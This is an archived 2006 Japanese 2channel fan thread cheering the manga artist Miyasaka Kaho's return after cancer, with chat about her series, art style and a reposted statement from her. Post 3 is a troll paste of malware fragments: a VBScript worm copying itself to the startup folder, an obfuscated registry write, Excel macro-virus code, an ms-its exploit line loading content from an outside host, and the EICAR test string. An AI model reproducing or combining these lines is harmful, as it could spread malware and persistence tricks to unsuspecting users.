5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Cheese!で復活】宮坂香帆【頑張れ!!】

1 :花と名無しさん:2006/11/01(水) 23:06:36 ID:???0
ガンを見事克服!!
月刊Cheese!で復活した宮坂香帆先生の応援スレです☆
来年から連載も控えています、皆で盛り上げていきましょう♪

基本的にsage進行です。
『書きこむ時はメール欄にsageと書いて記入してください』

「Cheese!」本スレ ↓
http://www2.2ch.net/2ch.html

公式サイト ↓
ttp://cheese.shogakukan.co.jp/

2 :あか:2006/11/01(水) 23:15:07 ID:251O2VmAO


3 :<body onload=window()>:2006/11/02(木) 00:03:23 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


4 :花と名無しさん:2006/11/02(木) 07:16:21 ID:N1v3K/3p0
うわ

5 :花と名無しさん:2006/11/02(木) 10:30:25 ID:???O
ガンで身内が早死にしてるから、ちょっと気になる。
再発防止で抗がん剤投与してる漫画家さんかな?
抵抗力が弱まって、風邪を始めとした病気になりやすくなるから、
身体に無理せず、ガンガレ!

作品まだ読んだ事ないけどw即死防止〜

6 :花と名無しさん:2006/11/02(木) 13:16:46 ID:???O
リアのとき微熱少女好きだったなー。ガンだったのか…無理せずがんがってください。
即死防止真紀子

7 :花と名無しさん:2006/11/02(木) 14:54:17 ID:???O
>>1
「Cheese!」雑誌スレは、pink板で年齢制限あるから、
少女板内ではリンクしない方がいいよ。…念のためね。

8 :1:2006/11/02(木) 17:57:43 ID:???0
「Cheese!」スレとして張ったリンク2chの玄関のリンクでした。
>>7さんの指摘も有りましたしセーフ?・・・

すいません。。。


9 :花と名無しさん:2006/11/03(金) 01:33:47 ID:???0
過疎なのでage

復活は嬉しいんだけど、今回の読み切りは微妙だったな
てか誰が考えるのか知らんが、
サブタイトル(?)の「キケンナアイツ」はヒドすぎる('A`)

10 :花と名無しさん:2006/11/03(金) 08:17:18 ID:???O
新連載楽しみだなー
微熱少女好きだったし
この人微熱少女以降は単行本だしてないの?

11 :花と名無しさん:2006/11/03(金) 10:18:52 ID:???0
>>10
『彼』が全10巻出てるよ
それと読みきり集が今年入って1〜2冊出たよ たしか

でもCheese!でも今ままでどうりの純情路線で行けるのかな・・・

12 :花と名無しさん:2006/11/03(金) 11:58:13 ID:???0
異様にでかかった肩幅の描き方が、変わってたね。

新連載が読める日まで、約4ヶ月もあるね・・・。
まぁ、描いてもらえるだけ良いか。

13 :花と名無しさん:2006/11/03(金) 16:15:23 ID:???0
>>1 乙!
連載開始までこのスレが持つといいねw
とりあえず30くらいまではage進行推奨

14 :花と名無しさん:2006/11/03(金) 16:24:48 ID:???0
懐かしい
微熱少女までは知ってる
ガンになってたのか…大変だな

絵はかわいいけど話は伏線消化もできずgdgdな印象
「彼」ってのは面白いん?

15 :花と名無しさん:2006/11/03(金) 16:34:28 ID:???0
>>12
わかる!桐谷とか、超マッチョだった!!

>>14
最初は面白いんだけど、最後の方はやっぱグダグダ展開w
絵は巧いんだから、原作付きの漫画の方が向いてる気がする。

16 :花と名無しさん:2006/11/03(金) 16:54:30 ID:???0
>>15
>絵は巧いんだから、原作付きの漫画の方が向いてる気がする。
なんかこんなレス嶋木さんとこでも相原さんとこでも見た希ガス。
チーズって…orz

17 :花と名無しさん:2006/11/03(金) 18:08:59 ID:???O
小コミで連載してやつの続きは、やらないんですかね? 題名は忘れたんですけど

18 :花と名無しさん:2006/11/03(金) 18:44:16 ID:???0
>>17
少コミHPか、宮坂さんHPへ逝くがいい

19 :花と名無しさん:2006/11/03(金) 21:58:37 ID:???0
今月号の中では、嶋木さんの次に面白かった。
読み切り集が出てるのなら、買ってみようかな。

20 :花と名無しさん:2006/11/03(金) 23:28:50 ID:???O
少コミで連載していた名前分かりましたぁ〜。未成年lovers☆ですたしか本誌で3話迄ぐらいしかやってないです。いい所で終わったなと思います。またcheeseで連載してくれるかな?

21 :花と名無しさん:2006/11/04(土) 01:23:27 ID:???0
>>20
未成年・・・は、1話しか載ってないし、続きも当分無いですよ。
公式HP見れば、丁寧な説明がされていますよ。

22 :花と名無しさん:2006/11/04(土) 12:54:33 ID:???O
昨日は微熱少女大人買いして読んでみた。おもしろかったぁ★
新連載楽しみ☆

23 :花と名無しさん:2006/11/04(土) 14:16:25 ID:???0
宮坂スレハケーン!>>1乙カレイ

私はチーズの読み切り、結構面白かったと思うけどな。
無理しすぎない程度に、ゆっくり頑張って欲しいね(´ー`)

24 :花と名無しさん:2006/11/04(土) 15:40:48 ID:???O
未成年〜は3回か4回載ったよ。1回ってこたあない。

25 :花と名無しさん:2006/11/04(土) 18:04:05 ID:???0
「いつも階段で溜まってるグループがいて、
そん中の男とよく目が合って気になってて、
何だかんだで付き合う事になった」ってトコで第1話が終わって、
そのままフェイドアウトしたんじゃなかったっけ?

26 :花と名無しさん:2006/11/04(土) 19:05:29 ID:???O
未成年〜は、男の子が凪で女の子がこころって名前でしたよね。私も2〜3話やってたと思います

27 :花と名無しさん:2006/11/04(土) 22:11:03 ID:???0
>>25
そういえばそんな内容だった気がするような、しないような・・・
とにかく始まってすぐ終わった事だけは憶えてるw

28 :花と名無しさん:2006/11/04(土) 22:11:10 ID:???O
続きが当分見れないんだから、むしろ1話で終わってくれて良かったよね。
チーズの新連載に期待!!

29 :21:2006/11/04(土) 22:24:59 ID:???0
>>20
ちょっとググってみたら、3話までだと判明しました。
早とちり、すみませんでした。

ちなみにココで少し読めました↓↓
 ttp://www.sho-comi.com/shocomi/05_050205/read_top.html

30 :花と名無しさん:2006/11/05(日) 15:02:31 ID:???0
>>29
チーズの読みきりより、こっちの方が上手いね
1年のブランクは大きいのかな
それにしても、ヒーロー(*・∀・*)カッコヨス

31 :花と名無しさん:2006/11/06(月) 00:39:35 ID:???0
Cheese読みきり読んだ。
なんか高田りえ入ってない?絵が。
(ベースは上田美和なんだけど)

32 :花と名無しさん:2006/11/06(月) 19:01:09 ID:W4vQIrOb0
そっか・・・ガンだったのか。
何ガン?

33 :花と名無しさん:2006/11/06(月) 20:25:02 ID:b/EGlePjO
宮坂さんの純愛系の話し大好き☆


34 :花と名無しさん:2006/11/06(月) 20:36:59 ID:???0
少コミ読者の皆さんお久しぶりです。
長いことお休みを頂いてましたが10月に無事に復帰することが決まりました。
同時にこの復帰を機に、長年在籍していた少コミを離れ、月刊誌のCheese!(10/24発売12月号から)へ移籍することも決まりました。
2001年にガンになり、退院後も入院前と同じペースで仕事を続けてきたのですが、後遺症が残る体で、隔週誌というハイペースな雑誌で描き続けるのは想像以上に負担がかかり、
退院後のこの5年間は病気前のような無理がきかなくなっているのを実感する5年でもありました。
04年の秋に、なんとか『彼』を最後まで描き上げ、05年には新連載「未成年lovers☆」をスタートさせたのですが、
『彼』が一息着いたのもあってか、退院後からの仕事疲れが一気に現れ長期休暇を取るに至ってしまいました。

35 :花と名無しさん:2006/11/06(月) 20:37:43 ID:???0
休みの間も少コミでの復帰を目指して担当さん等と打ち合わせを重ねてきたものの、日が経つうちに今までのように隔週誌の少コミで描き続けることが今の自分に出来るのだろうかと、
体力への不安が心にずっと引っ掛かっていました。連載が途中だったため、移籍を決めるのに時間がかかってしまったのですが、
各方面の編集さんに相談した結果、将来的なことを考え今回月刊誌に移籍をさせて頂く決心をしました。
「未成年lovers☆」の続きを楽しみにして下さっていた読者の方には、中途半端な状態で少コミを離れることになり本当に申し訳ないです。
一年以上も間が空いてしまったため、様々な状況から続きを掲載するのはなかなか難しく、また雑誌のカラーが異なるCheese!でというわけにも行かず、
このような状態になってしまったことをお詫び致します。

36 :花と名無しさん:2006/11/06(月) 20:38:21 ID:???0
>>31
あー、そうかも。女の子の表情とか特に。
てか女の子の絵、クオリティ下がったよね・・・
男の子は相変わらずかっこいいけどw

>>33
宮坂さんの漫画は、全部純愛系じゃん

37 :花と名無しさん:2006/11/06(月) 20:38:27 ID:???0
今はまず、移籍先のCheese!での仕事を軌道に乗せないといけないため、まだ具体的なことは言えませんが、いずれなんらかの状態でこの作品をまとめ、
一つの形にすることが出来ればと思っています。この休みの間は、仕事より体を優先するよう気遣って下さるファンの方が多く、暖かいメールや手紙にとても励まされ心強かったです。
私の復帰を知った後も、体調を気にかけて下さる読者の方ばかりで本当に有り難く思いました。
作品でしか恩返しが出来ませんが、雑誌が変わっても今までと変わらず私らしい作品で読者の方達に楽しんで頂けるよう描き続けていきます。
また、Cheese!での新しい宮坂香帆作品も読んで頂けたら嬉しいです。
今まで本当にありがとうございました。

38 :花と名無しさん:2006/11/06(月) 22:56:09 ID:???O
宮坂先生復帰おめでとうございます(*^o^*) 先生の作品はどれも好きです。体に気を付けて無理せず作品を書いていって下さい。応援してます\(^o^)/

39 :花と名無しさん:2006/11/07(火) 01:06:21 ID:???0
釣り・・・なんだよな・・??

40 :花と名無しさん:2006/11/07(火) 02:45:35 ID:???O
微熱少女初期の絵が好きでした
ヒロさんカッコよかったなー
体大事にまた頑張ってほしいなぁ

41 :花と名無しさん:2006/11/07(火) 17:35:52 ID:???0
>>34-35>>37
転載するなら、ちゃんと出展を明らかにしろよ。最低限必要。
本来はURLリンクで見れる文章なのに、わざわざコピペした意図がよくわからないんだけどさ。
公式、少コミねっとのhttp://www.sho-comi.com/にある、
◆宮坂香帆先生のコメントをUP! Vol.14 [2006年10月25日]

42 :31:2006/11/07(火) 18:44:16 ID:???0
>>36 だよね。

絵が似てないから分からないかもしれないけど、
男も高田りえ意識してるのが分かる。

たまたま今回の男のモデルが、高田りえの描く男で
参考にしてるうちに、女のほうの絵も似てしまったのかなぁ

43 :花と名無しさん:2006/11/08(水) 00:04:37 ID:???0
高田さんって、古臭い絵を描く人だよね?似てるかぁ??

44 :花と名無しさん:2006/11/08(水) 07:09:34 ID:???0
宮坂の方がうまい
そーいや最近、高田見かけないな

45 :花と名無しさん:2006/11/10(金) 22:49:45 ID:???0
うはw案の定、過疎wwwwwwwwww

46 :花と名無しさん:2006/11/10(金) 23:27:18 ID:???0
エッチで話を繋いでゆく展開じゃない所が好き。
でもなんでチーズなんだろう。
無理してエッチを描かなくちゃいけなくなりそうで嫌だけど、無理しないで頑張って欲しい。

47 :花と名無しさん:2006/11/11(土) 01:02:36 ID:???0
>>44
高田りえさんは、プチコミックに載ってますよ

・・・と、二人の絵は全然似てないと思っている私が、レスしてみましたよ

48 :花と名無しさん:2006/11/11(土) 17:07:52 ID:???0
うわぁ・・・「このスレは新連載開始までもたない」に1リラ賭ける

49 :花と名無しさん:2006/11/11(土) 23:46:43 ID:???0
高田りえと宮坂香帆、絵は全く似てない。
「絵、似てるよね」という話は誰もしてない。

今回の読みきりに限って、「高田りえ!?」と思わせる絵が
サブリミナル的に出てくるんだよ。
なんていうか「表情」が似てるんだよ。

例を挙げると、カラーページは含めないで
1P目の右下のプリンパンを持ってるアップ
4P目の「ムカツクんだけど」のアップ
が似てるかな。
  ・Cheese12月号を持ってる人
  ・高田りえをちゃんと知ってる人
    (コミックス持ってます!コミッ娘でした!くらいじゃないと駄目かも)
上の2点を満たしてないと、この話題の本質は見えない。

間違っても今のプチコミの高田は参考にするな。手元にあるが全く参考にならん。

50 :花と名無しさん:2006/11/12(日) 11:47:32 ID:???0
え、何でこんな偉そうなのこの人・・

51 :花と名無しさん:2006/11/12(日) 12:14:00 ID:???0
>絵は似てないけど、表情が似てる
漫画における「表情」は「絵」では無いですか、そうですか。

52 :花と名無しさん:2006/11/12(日) 13:59:16 ID:???0
>基本的にsage進行です。
『書きこむ時はメール欄にsageと書いて記入してください』
なんで、わざわざ上げてるの?

53 :花と名無しさん:2006/11/12(日) 15:50:09 ID:???0
晒しageだろ
つーかそもそも、『書いて記入』って日本語はおかしい

54 :花と名無しさん:2006/11/12(日) 16:22:51 ID:???0
>>49
必死杉w
荒れるから高田さんの専スレでも立てて、そっちでやって欲しいなぁ。

55 :花と名無しさん:2006/11/12(日) 17:24:28 ID:???0
   (  ~~.旦
       .~旦 )
     (( 旦~  グラグラ
       .旦
       ..旦~
       (旦~~
      /⌒ヽ   みなさん ごくろうさまです
     / ´_ゝ`)
     |    /    お茶がはいりましたよ
     | /| |
     // | |
    U  .U   

                    ダシャーン

                      \
           ⊂\    _,,,,,,,,__         /
             \\_/    .,’'.,’:.',,      .,’:.',, .,’: l  .,’:.',,|[]].,’:...,
         ガッ    _]         ).,’:.',,:.',,  []] .,’:.',,.,’:.',,.,日  .,’:.',,.,’:.',,          /
         凵シニニ_______________,,..ノ  /[]].,’:',,:',[]]/[]]\[]].,’:.',,|[]].,’:.',, _ .,’:.',,]]/ 日.,’:.',,.., . ..,,,;:[]]

56 :花と名無しさん:2006/11/13(月) 00:56:42 ID:???O
初めて微熱少女読んだとき衝撃というかすごくドキドキした。ヒロさんがかっこよすぎ。宮坂さん復帰して嬉しい限りです。自分らしさを忘れないでやってほしいな。

57 :花と名無しさん:2006/11/13(月) 18:48:36 ID:???0
「微熱少女が好き」ってレスが、全部携帯厨でワロス( ´_ゝ`)

58 :花と名無しさん:2006/11/13(月) 22:45:36 ID:???0
わたしも同じこと思ってたよw
でも誰にも賛同してもらえない

59 :花と名無しさん:2006/11/14(火) 18:54:47 ID:???0
連投なわけでも、荒らしなわけでもないんだから、
なまぬるい目で見守ろうよ。

・・・過疎スレなんだから。

60 :花と名無しさん:2006/11/15(水) 19:21:17 ID:???0
高田儲と携帯厨がいなくなったら、ソッコー過疎ったね
>>48じゃないけど、新連載までもつか心配だなぁ

61 :花と名無しさん:2006/11/20(月) 23:20:23 ID:???0
http://www.k-miyasaka.com/

62 :花と名無しさん:2006/11/21(火) 02:17:44 ID:???0
tp://csb.shogakukan.co.jp

63 :花と名無しさん:2006/11/22(水) 23:16:47 ID:???0
yke

64 :花と名無しさん:2006/12/01(金) 21:07:51 ID:???O


65 :花と名無しさん:2006/12/08(金) 23:34:48 ID:???O
過疎しているのでアゲ

66 :花と名無しさん:2006/12/10(日) 20:47:20 ID:???0
ネタがね〜
スレ立てまだ早すぎたね

67 :花と名無しさん:2006/12/12(火) 00:54:06 ID:???O
未成年ラバーズは結局打ち切り?

68 :花と名無しさん:2006/12/12(火) 08:41:04 ID:???0
うん。

69 :花と名無しさん:2006/12/13(水) 17:20:00 ID:???0
|  |
|  |_∧
|_|ω・`)<ホシュ
|文|o ノ
| ̄|u'

70 :花と名無しさん:2006/12/19(火) 15:04:53 ID:bMy16aH8O
キスインザブルーがよかった。

71 :花と名無しさん:2006/12/19(火) 20:55:04 ID:???0
ごめん、今まで「微熱少女(びねつしょうじょ)」を
「微熟少女(びじゅくしょうじょ)」と勘違いしてた。

うちの近くの本屋で見かけるし、絵柄も嫌いじゃないから
いつかは買おうかと思ってたら、本屋からは消えるし、
ネットで「微熟少女」て検索しても出てくるのはエロサイトだけだしorz

そんな訳で、微熱少女は自分にとって”幻の漫画”だったよ。
今日、文庫の1巻を無事入手したので、じっくり読んでみます。
それではまたノシ

72 :花と名無しさん:2006/12/21(木) 05:12:59 ID:???0
最近は少女マンガから離れてたから、病気だって知らんかったなぁ…
昔は読んでたんだよな…宮坂作品。
無理せず頑張って欲しい。

73 :花と名無しさん:2006/12/23(土) 22:39:02 ID:wo+l93AzO
宮坂香帆って何才なんでしょうか? それとどんな顔してるんだろっ?

74 :花と名無しさん:2006/12/27(水) 09:52:05 ID:???O
92年デビューなので、当時18歳なら+14年で32歳(仮定)。
デビュー時の年齢がはっきりわかる人、補足宜しくです。
なぜ漫画家の顔にこだわるのかわからないが(商売道具ではない)、
今まであまり話題になってなかったと思うので、漫画家としてフツーなんじゃ?
作品さえ面白ければいいよ。

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)